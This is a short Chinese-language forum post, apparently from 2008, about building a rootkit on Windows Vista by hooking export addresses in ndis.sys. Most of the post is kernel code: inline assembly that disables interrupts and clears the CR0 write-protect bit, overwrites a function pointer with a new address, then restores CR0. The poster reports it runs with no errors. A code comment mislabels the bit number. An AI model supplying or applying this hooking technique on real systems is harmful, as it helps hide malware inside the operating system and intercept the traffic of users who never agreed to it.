-
-
[讨论]vista rootkit
-
发表于:
2008-9-13 18:04
4476
-
我已经很轻意地突破了Rootkit环境,我想在vista的ndis.sys文件中挂接一些函数的导出地址.我用了一个很滥的技术便实现了—利用系统分页得到写权限以下是代码:
old_virt_func_addr = (ULONG *) MmGetSystemAddressForMdlSafe(mdl, NormalPagePriority);
//得到系统分面地址
__asm
{
cli
push eax
mov eax, cr0
mov SAVECR0, eax
and eax, 0xFFFEFFFF mov cr0, eax//设置系统页面文件的写权限,cr0的第17位是页
//写权限控制.
pop eax
}
*(ULONG *)old_virt_func_addr = new_function_addr;
__asm
{
push eax
mov eax, SAVECR0
mov cr0, eax
pop eax
sti
}.
编译执行后系统什么错误提示都没有.
原作者地址: https://www.rootkit.com/board.php?disp=12371&did=edge0&closed=2&thread=12371
[课程]FART 脱壳王!加量不加价!FART作者讲授!
